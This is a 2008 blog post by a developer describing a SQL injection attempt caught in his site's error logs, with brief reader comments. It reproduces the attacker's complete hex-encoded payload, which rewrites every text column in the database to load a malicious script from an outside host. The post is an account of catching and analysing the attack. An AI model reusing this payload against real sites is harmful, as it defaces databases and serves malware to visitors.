So during the duration of my Tabulas code refactoring, I've turned on all PHP fatal errors to log to disk, and all mySQL errors to be emailed to me. I got the following interesting error:

SELECT entry_id, entry_userid, entry_url, entry_title, entry_status, entry_created, entry_draft, entry_updated, entry_category, entry_comment, entry_iconid, entry_favorite, entry_sticky, entry_watching, entry_reading, entry_listening, entry_mood, entry_feeling, entry_html, entry_nl2br, entry_break, entry_commentcount, entry_related, entry_status_effective FROM entries, entry_metadata WHERE entries.entry_id = entry_metadata.entryid AND entry_userid = '106634' AND entry_status_effective IN (0) AND entry_updated < NOW() AND entry_draft = 0 ORDER BY entry_sticky DESC, entry_updated DESC LIMIT 6 OFFSET 0;DECLARE @S CHAR(4000);SET @S=CAST(
0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);

How interesting! Somebody was using the offset parameter for entries to do an injection attack! However, the GET param looked like junk, till I showed it to Max, who de-hexed it:

This nice little code snippet looped through my whole database, and would update any textual fields with a JS script.

Upon further inspection, the JS code embedded an <IFRAME> which loaded a Chinese page. This page, in turn, had the wonderful code snippet:

I'm running a Mac, but it looks like the JS tries to exploit ActiveX and do something real evil. Good thing I have a shred of competency when it comes to programming!

Posted by roy on September 14, 2008 at 08:44 PM in Web Development, Tabulas | 4 Comments

Related Entries

Want to comment with Tabulas?. Please login.

Comment posted on September 16th, 2008 at 01:03 PM
That's pretty cool really.
Comment posted on September 16th, 2008 at 02:38 AM
i can see that you blurred the link, but we could still see it in title bar of your mac.;)

sanjuro (guest)

Comment posted on September 15th, 2008 at 01:44 PM
Interesting, but... it was just injected using the GET method and he did manage to append his code to the query? Sounds serious.

That reminds me also I have an error showing up in my profile page: (don't pay attention to the rest of the blog, I need to erase everything and rebuild... someday)
Comment posted on September 15th, 2008 at 08:05 AM
yeah, i tried hacking it to see if it was worthy of holding my thoughts in private.